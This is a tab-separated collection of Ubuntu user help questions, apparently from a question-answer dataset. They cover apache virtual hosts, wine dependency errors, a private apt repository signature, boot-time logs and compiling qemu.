424292	apache 2.4 vhost not working on 13.10	i just installed ubuntu 13.10 ( my first linux/non winx platform ever ) and all is well except the main thing i switched to ubuntu for , the web server . i have been at it for 2 whole days straight with no or very little luck getting my sites/vhosts working correctly ( or at all ) . on win7 with wamp i had running a site http : //mysite and it 's vhost file was < virtualhost *:80 > documentroot c : /wamp/www/my_site servername my_site serveralias my_site < directory / > options followsymlinks allowoverride all < /directory > < directory c : /wamp/www/my_site > options followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > < /virtualhost > and all worked perfectly.then when i tried to do the same here , well you know the story.can someone help me write the *.conf file ? additionllay i wish to use a custom path , i do n't want any of my projects to be located in /var/www/ ! the /etc/hosts/ file was editted correctly and i had no problems there . i ca n't start expalining all the errors and problems i had while doing this , it would take me 5h just to type it all , there we 're many is what i am tryng to say . to clarify need help writing the vhost file and any other modifications i need to do to apache to get it running again , because of the difference between the two os 's i just ca n't understand , yet .
424293	mts usb modem on ubuntu 13.10	i have newly installed ubuntu 13.10 on my laptop . but it can not mount the mts mblaze usb modem . so i am unable to connect to net . when i am typing lsusb on the terminal it is showing the device . how to mount it ?
424294	wine dependency problem	i have 64 bit ubuntu 12.04 on my system . with nvidia graphic card . i installed some packages off line by using dpkg and also some programs from source code . now i have problem installing wine on my system . i have tried these commands : sudo apt-add-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.7 but it gives me this : the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-i386 ( = 1:1.7.12-0ubuntu1 ) e : unable to correct problems , you have held broken packages . i have also tried aptitude : sudo aptitude install wine1.7 one of the solution it suggests is this : remove the following packages : 1 ) empathy 2 ) espeak 3 ) ffmpeg 4 ) gnome-media 5 ) gstreamer0.10-plugins-good 6 ) indicator-sound 7 ) libasound2-plugins 8 ) libav-tools 9 ) libavdevice53 10 ) libcanberra-pulse 11 ) libespeak1 12 ) libfarstream-0.1-0 13 ) libfluidsynth-dev 14 ) libfluidsynth1 15 ) libjack-dev 16 ) libjack0 17 ) libportaudio2 18 ) libpurple0 19 ) libtelepathy-farstream2 . . . install the following packages : 40 ) libcanberra-gstreamer [ 0.28-3ubuntu3 ( precise ) ] keep the following packages at their current version : . . . 63 ) wine1.7 [ not installed ] 64 ) wine1.7-amd64 [ not installed ] 65 ) wine1.7-i386 : i386 [ not installed ] leave the following dependencies unresolved : . . . 84 ) wine1.7-amd64 recommends libasound2-plugins 85 ) wine1.7-i386 : i386 recommends libasound2-plugins : i386 86 ) wine1.7-i386 : i386 recommends libsane : i386 87 ) wine1.7-i386 : i386 recommends libxcomposite1 : i386 88 ) wine1.7-i386 : i386 recommends libxcursor1 : i386 89 ) wine1.7-i386 : i386 recommends libxi6 : i386 90 ) wine1.7-i386 : i386 recommends libxinerama1 : i386 91 ) wine1.7-i386 : i386 recommends libxrandr2 : i386 92 ) wine1.7-i386 : i386 recommends libxrender1 : i386 93 ) wine1.7-i386 : i386 recommends libxt6 : i386 94 ) wine1.7-i386 : i386 recommends libxxf86vm1 : i386 as it shows aptitude is going to delete many unrelated packages and not installing wine . i do n't know how resolve this dependecy problem . i could install wine on newly installed ubuntu but in my case i do n't know what packages are causing this problem . i also tried other version of wine such as wine wine1.6 wine1.4 wine1.3 . i also tried installing wine from source code but it only can run non gui applications .
424298	multiple issues using vizio tv as a monitor	ubuntu 12.04 . i am using a vizio 24 '' tv as a monitor . although it is a 1080 hd tv i can only use the lowest resolution ( 800x600 ) . here are some of the issues : the display setting says it is a viz 23 ? why not 24 ? the icons are not visible ( shifted left ) , including the password prompt on reboot . the low resolution does not allow changing of font size , which are huge by default . when i attach a regular 19 '' dell monitor it seems to work fine . thanks in advance for any tips .
424302	creating a bootable drive for ubuntu on mac	i 've decided to switch from os x to ubuntu . i 'm following this documentation on ubuntu 's site for creating a bootable usb drive . i created the iso to img . i ran diskutil list and inserted my flash drive and ran diskutil list again . my drive is assigned to /dev/disk1 . i ran diskutil unmountdisk /dev/disk1 , then executed sudo dd if=/ubuntu-13.10-desktop-amd64.dmg of=/dev/rdisk1 bs=1m then i ran diskutil eject /dev/disk1 . then i restarted , held the alt+option key . the boot manager came up , but my flash drive was n't coming up as an option . i tried this again just now and it said : the disk you inserted was not readable by this computer . i 've never had an issue with this drive before . i restarted anyway , just to see if it worked and i 'm still only getting my main hard drive as an option in boot manager . where do i go from here ?
424303	why wo n't my ipod register and when it does not sync in rhythmbox ?	when i plug my ipod into my computer it does n't appear anywhere . on the ipod 's screen it says that it 's connected , but i ca n't find the ipod anywhere on my computer . on the rare occasion that i plug the ipod in and the computer registers it i can find it in the home folder and on rhythmbox . i go to sync my music library off of rhythmbox onto my ipod and the button is there , but dull and wo n't allow me to click on it . i 've tried to manually sync the songs by clicking and dragging , but that also has no effect .
424307	not able to delete folder from gui or terminal	`` nvxhvl3rue '' this unknown folder got created automatically . i am not able to change permission not able to delete from terminal it stucks need to hit ctrl+z when i open folder its blank stuck at loading tried from both normal and root nautilus but stuks at prepaing to delete 3,20,865 files ( 360 mb 's ) that file count is still increasing . output of only ll drwxrwxrwx 2 rnztx rnztx 360812544 feb 22 01:03 nvxhvl3rue/ result of smart test !
424308	ubuntu e gnome 3 connection behind a proxy	i do n't know if it 's a general problem with firefox or if it 's just my system doing things wrong . i 've got a proxy script set up in firefox to use system proxy settings . whenever i restart firefox the proxy does not work until i go to firefox settings , change the option to `` no proxy '' , confirm , and then back again on `` use system proxy '' . any idea ?
424310	installing samsung xpress m2825dw drivers on kubuntu 12.04	i 'm having trouble with installing printer drivers . i tried to find them in the data base and could not find them . so i downloaded the linux drivers from samsung.com ( http : //www.samsung.com/de/support/model/sl-m2825dw/see-downloads # ) and then used the .ppd-file . the error message was : package missing : `` /usr/lib/cups/filter/rastertospl '' . where can i find this package ? regards
424313	long booting time	can anyone help me fix the booting time of my machine . ? it is almost 25 seconds . my dmesg is the following : ... . [ 4.423259 ] usb 3-4 : new usb device found , idvendor=0bda , idproduct=5728 [ 4.423262 ] usb 3-4 : new usb device strings : mfr=3 , product=1 , serialnumber=2 [ 4.423264 ] usb 3-4 : product : lenovo easycamera [ 4.423265 ] usb 3-4 : manufacturer : cf0d9rnvf [ 4.423266 ] usb 3-4 : serialnumber : 200901010001 [ 4.464387 ] switched to clocksource tsc [ 4.588257 ] usb 3-7 : new full-speed usb device number 3 using xhci_hcd [ 4.606033 ] usb 3-7 : new usb device found , idvendor=105b , idproduct=e065 [ 4.606035 ] usb 3-7 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 4.606037 ] usb 3-7 : product : bcm43142a0 [ 4.606038 ] usb 3-7 : manufacturer : broadcom corp [ 4.606039 ] usb 3-7 : serialnumber : f82fa8fecf18 [ 4.772455 ] usb 3-8 : new high-speed usb device number 4 using xhci_hcd [ 4.788774 ] usb 3-8 : new usb device found , idvendor=0bda , idproduct=0129 [ 4.788777 ] usb 3-8 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 4.788778 ] usb 3-8 : product : usb2.0-crw [ 4.788780 ] usb 3-8 : manufacturer : generic [ 4.788781 ] usb 3-8 : serialnumber : 20100201396000000 [ 4.849244 ] ext4-fs ( sda4 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 13.264756 ] systemd-udevd [ 257 ] : starting version 204 [ 13.310425 ] lp : driver loaded but no devices found [ 13.363291 ] mei_me 0000:00:16.0 : pci- > apic irq transform : int a - > irq 16 [ 13.363302 ] mei_me 0000:00:16.0 : setting latency timer to 64 [ 13.363338 ] mei_me 0000:00:16.0 : irq 42 for msi/msi-x [ 13.380011 ] [ drm ] initialized drm 1.1.0 20060810 [ 13.401031 ] acpi exception : ae_bad_parameter , thread 1435721152 could not acquire mutex [ 0x1 ] ( 20130517/utmutex-285 ) [ 13.401040 ] acpi exception : ae_bad_parameter , thread 1435721152 could not acquire mutex [ 0x1 ] ( 20130517/utmutex-285 ) [ 13.401042 ] acpi exception : ae_bad_parameter , thread 1435721152 could not acquire mutex [ 0x1 ] ( 20130517/utmutex-285 ) [ 13.402442 ] cfg80211 : calling crda to update world regulatory domain [ 13.426879 ] lib80211 : common routines for ieee802.11 drivers [ 13.426882 ] lib80211_crypt : registered algorithm 'null' [ 13.430668 ] wl : module license 'mixed/proprietary ' taints kernel . [ 13.430671 ] disabling lock debugging due to kernel taint [ 13.470166 ] wl 0000:08:00.0 : pci- > apic irq transform : int a - > irq 17 [ 13.481802 ] i915 0000:00:02.0 : pci- > apic irq transform : int a - > irq 16 [ 13.483912 ] [ drm ] memory usable by graphics device = 2048m [ 13.483917 ] i915 0000:00:02.0 : setting latency timer to 64 [ 13.509421 ] [ drm ] radeon kernel modesetting enabled . [ 13.509518 ] radeon 0000:01:00.0 : enabling device ( 0006 - > 0007 ) [ 13.509525 ] radeon 0000:01:00.0 : pci- > apic irq transform : int a - > irq 16 [ 13.509706 ] i915 0000:00:02.0 : irq 43 for msi/msi-x [ 13.509712 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 13.509713 ] [ drm ] driver supports precise vblank timestamp query . [ 13.509770 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 13.536291 ] type=1400 audit ( 1393177255.456:2 ) : apparmor= '' status '' operation= '' profile_load '' parent=296 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=307 comm= '' apparmor_parser '' [ 13.536296 ] type=1400 audit ( 1393177255.456:3 ) : apparmor= '' status '' operation= '' profile_load '' parent=296 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=307 comm= '' apparmor_parser '' [ 13.536299 ] type=1400 audit ( 1393177255.456:4 ) : apparmor= '' status '' operation= '' profile_load '' parent=296 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=307 comm= '' apparmor_parser '' [ 13.536687 ] type=1400 audit ( 1393177255.456:5 ) : apparmor= '' status '' operation= '' profile_replace '' parent=296 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=307 comm= '' apparmor_parser '' [ 13.536691 ] type=1400 audit ( 1393177255.456:6 ) : apparmor= '' status '' operation= '' profile_replace '' parent=296 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=307 comm= '' apparmor_parser '' [ 13.536902 ] type=1400 audit ( 1393177255.456:7 ) : apparmor= '' status '' operation= '' profile_replace '' parent=296 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=307 comm= '' apparmor_parser '' [ 13.543781 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 13.550100 ] lib80211_crypt : registered algorithm 'tkip' [ 13.667468 ] linux video capture interface : v2.00 [ 13.676240 ] uvcvideo : found uvc 1.00 device lenovo easycamera ( 0bda:5728 ) [ 13.682727 ] bluetooth : core ver 2.16 [ 13.682750 ] net : registered protocol family 31 [ 13.682751 ] bluetooth : hci device and connection manager initialized [ 13.682756 ] bluetooth : hci socket layer initialized [ 13.682758 ] bluetooth : l2cap socket layer initialized [ 13.682761 ] bluetooth : sco socket layer initialized [ 13.685198 ] input : lenovo easycamera as /devices/pci0000:00/0000:00:14.0/usb3/3-4/3-4:1.0/input/input1 [ 13.685287 ] usbcore : registered new interface driver uvcvideo [ 13.685289 ] usb video class driver ( 1.1.1 ) [ 13.692885 ] rts5139 : module is from the staging directory , the quality is unknown , you have been warned . [ 13.693671 ] usbcore : registered new interface driver btusb [ 13.705070 ] scsi6 : scsi emulation for rts5139 usb card reader [ 13.707924 ] scsi 6:0:0:0 : direct-access generic- xd/sd/m.s . 1.00 pq : 0 ansi : 0 ccs [ 13.708253 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 13.709912 ] usbcore : registered new interface driver rts5139 [ 13.741778 ] microcode : cpu0 sig=0x306c3 , pf=0x10 , revision=0x12 [ 13.806259 ] ext4-fs ( sda4 ) : re-mounted . opts : errors=remount-ro [ 13.831120 ] eth1 : broadcom bcm4365 802.11 hybrid wireless controller 6.30.223.141 ( r415941 ) [ 13.885161 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 14.000606 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 15.149516 ] psmouse serio1 : elantech : assuming hardware version 3 ( with firmware version 0x450f03 ) [ 15.193916 ] psmouse serio1 : elantech : synaptics capabilities query result 0x78 , 0x17 , 0x0b . [ 15.412081 ] console : switching to colour frame buffer device 170x48 [ 15.414549 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 15.414550 ] i915 0000:00:02.0 : registered panic notifier [ 15.423932 ] input : etps/2 elantech touchpad as /devices/platform/i8042/serio1/input/input2 [ 15.431732 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 15.431866 ] [ drm ] initializing kernel modesetting ( hainan 0x1002:0x6663 0x17aa:0x3801 ) . [ 15.431898 ] [ drm ] register mmio base : 0xb8000000 [ 15.431899 ] [ drm ] register mmio size : 262144 [ 15.431966 ] radeon 0000:01:00.0 : invalid rom contents [ 15.432201 ] radeon 0000:01:00.0 : invalid rom contents [ 15.432223 ] [ drm : radeon_get_bios ] *error* unable to locate a bios rom [ 15.432246 ] radeon 0000:01:00.0 : fatal error during gpu init [ 15.432266 ] [ drm ] radeon : finishing device . [ 15.432268 ] [ ttm ] memory type 2 has not been initialized [ 15.433436 ] radeon : probe of 0000:01:00.0 failed with error -22 [ 15.435587 ] snd_hda_intel 0000:00:03.0 : pci- > apic irq transform : int a - > irq 16 [ 15.435632 ] snd_hda_intel 0000:00:1b.0 : pci- > apic irq transform : int a - > irq 22 [ 15.435663 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 15.490247 ] hda_codec : cx20757 : bios auto-probing . [ 15.490472 ] autoconfig : line_outs=1 ( 0x17/0x0/0x0/0x0/0x0 ) type : speaker [ 15.490473 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 15.490474 ] hp_outs=1 ( 0x16/0x0/0x0/0x0/0x0 ) [ 15.490475 ] mono : mono_out=0x0 [ 15.490476 ] inputs : [ 15.490477 ] internal mic=0x1a [ 15.490478 ] mic=0x19 [ 15.491196 ] hda_codec : enable sync_write for stable communication [ 15.501234 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card1/input3 [ 15.502016 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card1/input4 [ 15.523435 ] hda driver get symbol successfully from i915 module [ 15.523469 ] snd_hda_intel 0000:00:03.0 : irq 45 for msi/msi-x [ 15.535575 ] bluetooth : ca n't load firmware , may not work correctly [ 15.539794 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 15.574325 ] hda_codec : invalid connect_list verb 5 [ 1 ] :0 [ 15.574389 ] hda_codec : invalid connect_list verb 6 [ 1 ] :0 [ 15.574452 ] hda_codec : invalid connect_list verb 7 [ 1 ] :0 [ 15.574727 ] input : hda intel mid hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:03.0/sound/card0/input5 [ 15.574817 ] input : hda intel mid hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:03.0/sound/card0/input6 [ 15.574871 ] input : hda intel mid hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:03.0/sound/card0/input7 [ 15.575071 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 15.575072 ] bluetooth : bnep filters : protocol multicast [ 15.575077 ] bluetooth : bnep socket layer initialized [ 15.584610 ] bluetooth : rfcomm tty layer initialized [ 15.584618 ] bluetooth : rfcomm socket layer initialized [ 15.584620 ] bluetooth : rfcomm ver 1.11 [ 15.618197 ] cfg80211 : world regulatory domain updated : [ 15.618200 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 15.618202 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.618203 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.618204 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.618205 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.618206 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.724504 ] [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off [ 15.913016 ] init : avahi-cups-reload main process ( 603 ) terminated with status 1 [ 16.020168 ] ppdev : user-space parallel port driver [ 16.065296 ] init : failsafe main process ( 529 ) killed by term signal [ 16.132301 ] type=1400 audit ( 1393177258.048:8 ) : apparmor= '' status '' operation= '' profile_load '' parent=661 profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=706 comm= '' apparmor_parser '' [ 16.132308 ] type=1400 audit ( 1393177258.048:9 ) : apparmor= '' status '' operation= '' profile_load '' parent=661 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=706 comm= '' apparmor_parser '' [ 16.132753 ] type=1400 audit ( 1393177258.048:10 ) : apparmor= '' status '' operation= '' profile_replace '' parent=661 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=706 comm= '' apparmor_parser '' [ 17.663229 ] alx 0000:09:00.0 : irq 46 for msi/msi-x [ 17.939108 ] type=1400 audit ( 1393177259.856:11 ) : apparmor= '' status '' operation= '' profile_load '' parent=830 profile= '' unconfined '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=835 comm= '' apparmor_parser '' [ 19.697001 ] cfg80211 : calling crda for country : gr [ 19.698788 ] cfg80211 : regulatory domain changed to country : gr [ 19.698790 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 19.698791 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 19.698793 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 19.698794 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 19.698795 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) [ 19.698796 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 26.453442 ] hda-intel : irq timing workaround is activated for card # 1 . suggest a bigger bdl_pos_adj . [ 300.161162 ] mce : [ hardware error ] : machine check events logged
424314	trying to configure privatetunnel in ubuntu 12.04 lts 32-bit	i 'm new to ubuntu . step-by step i followed the procedure i found at http : //ubuntuforums.org/showthread.php ? t=1881124 but there 's one step i skipped because i do n't understand what they are talking about , and my vpn will not connect to privatetunnel ( it just keeps telling me timed out when i try to connect ) : the last line below is the one i 'm stuck with : open client.ovpn with a text editor . export the “user certificate” “ca certificate” “private key” and the “key file” to individual text files : look through your “client.ovpn” file and find the < ca > < /ca > tags . copy that section into a text file named “ca.pem” ( do n't include the tags ) . look through your “client.ovpn” file and find the < cert > < /cert > tags . copy that section into a text file named “uc.pem” ( do n't include the tags ) . look through your “client.ovpn” file and find the < key > < /key > tags . copy that section into a text file named “pk.pem” ( do n't include the tags ) . look through your “client.ovpn” file and find the < tls-auth > < /tls-auth > tags . copy that section into a text file named “tls-auth.key” ( do n't include the tags ) . now move ca.pem , uc.pem , pk.pem , tls-auth.key , and client.ovpn to /etc/openvpn where 's the /etc/openvpn file in ubuntu 12.04 32-bit ? i copied the text files to my home folder and added them from there to the vpn configuration , and it seemed to accept them . also , if i open each of those text files myself , they seem correct . please help as i 've done everything except that ( left out the tags as explained above , etc )
424316	ubuntu linux filepath for windows mounted drive	i 'm using ubuntu desktop . i mounted a windows drive using the `` connect to a server '' option . it now shows up in the `` network '' list right above `` browse network '' . i 'm trying to cd to this folder in the terminal and can not seem to figure out what the correct file path is . when i go to the properties of the folder , it shows the location as `` smb : //engserver/engineering/ '' . however if i cd cd smb : //engserver/engineering/ it says there is no such file or directory . how do i access this folder via cd ?
424320	capture console output into variable ?	how could i capture the console output into a variable when running a utility so i can filter the text ? example : i am trying to capture the console output when i type bitcoind so that i can filter out the rpcpassword and write it to a config file . ubuntu @ ip-172-31-3-49 : ~ $ bitcoind error : to use bitcoind , you must set a rpcpassword in the configuration file : /home/ubuntu/.bitcoin/bitcoin.conf it is recommended you use the following random password : rpcuser=bitcoinrpc rpcpassword=eb5wdgzkqt77u4lhvvfnyxanvw2rpztsvm5xksonxbwc ( you do not need to remember this password ) the username and password must not be the same . if the file does not exist , create it with owner-readable-only file permissions . it is also recommended to set alertnotify so you are notified of problems ; for example : alertnotify=echo % s | mail -s `` bitcoin alert '' admin @ foo.com
424322	how can i install pepper plugin into chromium that is running from compiled src/out/ directory ?	yesterday after 12 hours of compilation process i managed to compile chromium from source code following this guide https : //code.google.com/p/chromium/wiki/linuxbuildinstructions to my surprize i noticed that only two plugins installed by default ; 1 ) chromoting viewer , 2 ) native client . chromium dropped npapi plugin and ppapi is not ported with source code due to licence restrictions . i run chromium from within ./../src/out/release/ directory in sandboxing with ./chrome-wrapper when i surf on youtube chromium asks me to install flash plugin that is already installed in my distribution . how can i use pepper plugin or flash plugin in sandboxing environment ?
424325	does encrypting home folder during the installation also encrypt other user 's home folder after the fact ?	if i were to select the option to encrypt my home folder when installing ubuntu , then does ubuntu automatically encrypt other user 's home folder that i create after i installed ubuntu ?
424327	preseeding without boot parameter ( change boot parameter at runtime )	i find it very limiting that the only way i can automate a install using preseeding is to pass boot options at the startup of the live cd . i am looking for a way of setting the whole thing , when the system is live system is up and running . is there anyway i can achieve this ? https : //help.ubuntu.com/12.04/installation-guide/i386/preseed-using.html # preseed-loading states : if you are using initrd preseeding , you only have to make sure a file named preseed.cfg is included in the root directory of the initrd . the installer will automatically check if this file is present and load it . so i am wondering : could i somehow place the preseed file at runtime and make the installer find and use it ?
424328	private secure-apt repository generating `` failed to fetch '' error , possibly incorrectly	tl ; dr version : i 'm setting up a secure apt repository with signed release file , and it 's giving me a `` failed to fetch release '' error message , which goes away entirely when i remove the release.gpg file . i can confirm that apt is getting the release file even when it says it 's unable to . my organization has a need for a local secure-apt repository , where we will host our own copy of updates for ubuntu 12.04 . the need comes from a number of reasons ( bandwidth , pre-testing of updates before releasing to production , all the usual . ) in the process of building the repo , i 've run into an unusual problem . first , the basics . the apt repo is being hosted on a small desktop running centos 6.5 , not a server ; currently it 's proof of concept . i 'm using nginx to act as a web server , and an ubuntu 12.04 vm to act as a client test bed for the proof of concept . i made a backup copy of /etc/apt/sources.list , then deleted it and started from scratch . it currently contains only : cat /etc/apt/sources.list # test repository for local private apt deb http : //mbwinnc641090/ precise main the directory structure has been copied from the existing ubuntu apt repos for precise . the release and release.gpg files sit in /dists/precise ( where / is relative to the root of the web server , not the file server ) ; packages , packages.gz and packages.bz2 sit in /dists/precise/main/binary-amd64 . there is a packages in /dists/precise/main/binary-i386 ; it does not appear in release.gpg , it is zero bytes in size , and was only added to solve a secondary problem that cropped up while i was looking at the real issue ( will explain in more detail below . ) i generated a 4096 rsa/4096 rsa key with opengpg , and have signed the release file with : gpg -abs -o release.gpg release i have exported the public key with gpg -- armor -- output ./apt-key-2.key -- export < myid > copied it onto a usb stick and then brought that over to the vm ; the key imported successfully onto the ubuntu vm with apt-key add ./apt-key-2.key the release file contents are as follows : origin : ubuntu label : ubuntu suite : precise version : 12.04 codename : precise date : wed , 25 apr 2012 22:49:23 utc architectures : amd64 components : main restricted universe multiverse description : ubuntu precise 12.04 md5sum : 3a72e2cbeccb018e855e59851c97fafb 1806 main/binary-amd64/packages 4e8e2385e95080b1c6e61ea032f286af 1023 main/binary-amd64/packages.bz2 871b13afb486f3faf4174e3c839ad6da 938 main/binary-amd64/packages.gz sha1 : d58e402014879a2d7f9a8890144daf8d05216bc0 1806 main/binary-amd64/packages 5782287bf8d853da47425dbf15aaf924a4505e1d 1023 main/binary-amd64/packages.bz2 c469ea854a1f15638fcff418e4ca527bb3a12a52 938 main/binary-amd64/packages.gz sha256 : ec3f7712fecf94de2337a0c554219f370ed2ddb4486e1e1cc147f90fb4b5d765 1806 main/binary-amd64/packages 5776bcdc534063094459f283619c85861758bae3718273ce6e34b6e052f9a495 1023 main/binary-amd64/packages.bz2 5c0eedc77ff872f2676c79116e55182e759cb8c41285a49bae075a7ea08f9942 938 main/binary-amd64/packages.gz as you can see , it contains md5sum , sha1 and sha256 records for the main/binary-amd64/packages , packages.bz2 and packages.gz files . i have double- and triple-checked that these are correct . the package files themselves contain only one package record ( again , proof of concept - start small and work up ) for firefox . it 's lengthy and i do not believe it 's relevant to the problem , so i will omit it for now , but if someone wants to see it i will edit it in afterwards . now , the actual problem - when apt-get is run , it complains about failing to fetch the release file : sudo apt-get -s -- allow-unauthenticated update [ sudo ] passwd for administrator : hit http : //mbwinnc641090 precise release.gpg hit http : //mbwinnc641090 precise release w : failed to fetch http : //mbwinnc641090/dists/precise/release unable to find expected entry 'main/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) however , i can confirm with 100 % certainty that it is not failing to pull the release file down . first , the nginx log files confirm that the apt request is getting both files ; access.log reports either http 304 and 0 byte transfers ( i.e . no change since the last copy of the file acquired ) , or if i touch both files on the repo , http 200 and the transfer sizes of both files is correct : no touch : 10.113.226.222 - - [ 21/feb/2014:08:12:12 -0600 ] `` get /dists/precise/release.gpg http/1.1 '' 304 0 `` - '' `` debian apt-http/1.3 ( 0.8.16~exp12ubuntu10.14 ) '' `` - '' 10.113.226.222 - - [ 21/feb/2014:08:12:12 -0600 ] `` get /dists/precise/release http/1.1 '' 304 0 `` - '' `` debian apt-http/1.3 ( 0.8.16~exp12ubuntu10.14 ) '' `` - '' touch : 10.113.226.222 - - [ 21/feb/2014:10:05:04 -0600 ] `` get /dists/precise/release.gpg http/1.1 '' 200 836 `` - '' `` debian apt-http/1.3 ( 0.8.16~exp12ubuntu10.14 ) '' `` - '' 10.113.226.222 - - [ 21/feb/2014:10:05:04 -0600 ] `` get /dists/precise/release http/1.1 '' 200 966 `` - '' `` debian apt-http/1.3 ( 0.8.16~exp12ubuntu10.14 ) '' `` - '' both files are being transferred as plaintext ; i added the `` default_type text/plain '' directive to the conf file for the nginx server ( note - whole server , not just this one virtual host . ) i can also confirm that apt-get is receiving the files - /var/lib/apt/lists has both mbwinnc641090_dists_precise_release and mbwinnc641090_dists_precise_release.gpg ; the file contents match exactly what is on the server ; the file size is exactly what is on the server ( and what is transferred according to nginx ) ; and the file timestamp changes to match the server time when i touch both files on the server . wget also succeeds in accessing the files , and i can browse directly to them in chrome/firefox/etc . so they 're there and available . where it gets really weird is that when i remove release.gpg from the directory ( either move it to another directory or rename it ) , suddenly the apt-get update command works . there 's nothing for it to update ( and initially it did complain about not being able to find packages in /dists/precise/main/binary-i386 , which went away when i created the empty packages file there ) , but the error message about not being able to remove release goes away entirely and it exits with zero error code . so it looks like something about apt does not like the signature i have . however , i can confirm that gpgv is able to verify the signature using the apt keyring : sudo gpgv -- keyring /etc/apt/trusted.gpg mbwinnc641090_dists_precise_release.gpg mbwinnc641090_dists_precise+release gpgv : signature made fri 21 feb 2014 10:04:56 am cst using rsa key id af57b06b gpgv : good signature from `` < my info > '' running apt get with `` -o debug : :acquire : :gpgv=true '' further confirms that apt is passing the key validation stage - apt-get returns : hit http : //mbwinnc641090 precise release.gpg hit http : //mbwinnc641090 precise release 33 % [ release gpgv 966 b ] inside verifygetsigners gpgv path : /usr/bin/gpgv keyring file : /etc/apt/trusted.gpg keyring path : /etc/apt/trusted.gpg.d/ preparing to exec : /usr/bin/gpgv /usr/bin/gpgv -- ignore-time-conflict -- status-fd 3 -- keyring /etc/apt/trusted.gpg /var/lib/apt/lists/partial/mbwinnc641090_dists_precise_release.gpg /var/lib/apt/lists/mbwinnc641090_dists_precise_release read : [ gnupg : ] sig_id slgwzaacepo9lztadgnf44gryaq 2014-02-21 1392998696 read : [ gnupg : ] goodsig 84332b63af57b06b < myinfo > got goodsig , key id : goodsig 84332b63af57b06b read : [ gnupg : ] validsig 09dbaf28acfd21dc5fbf797784332b63af57b06b 2014-02-21 1392998696 0 4 0 1 2 00 09dbaf28acfd21dc5fbf797784332b63af57b06b gpgv exited gpgv succeeded w : failed to fetch http : //mbwinnc641090/dists/precise/release unable to find expected entry 'main/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . so basically - i 'm out of ideas . any help at all would be appreciated ; i 'm sure at this point it 's just some incredibly stupid simple thing that i 've missed and you 'll all have a good laugh , but i 'm completely hosed .
424329	error trying to compile qemu from source	i am trying to compile qemu from source to get my hands dirty with its development . i cloned the package from the repository . i extracted the tarball and started with the configuration using ./configure when i got the following error : error : dtc ( libfdt ) not present . your options : ( 1 ) preferred : install the dtc ( libfdt ) devel package ( 2 ) fetch the dtc submodule , using : git submodule update -- init dtc i tried installing libfdt using sudo apt-get install libfdt-dev but this did not resolve the error . there is a similar question i have seen but this too could not solve the error i am facing : âerror : zlib check failedâ while compiling qemu how do i fix this error to successfully compile qemu from source ? edit : executing git submodule update -- init dtc while i am still in the qemu package 's directory returned the following error : fatal : not a git repository ( or any parent up to mount point /home ) stopping at filesystem boundary ( git_discovery_across_filesystem not set ) .
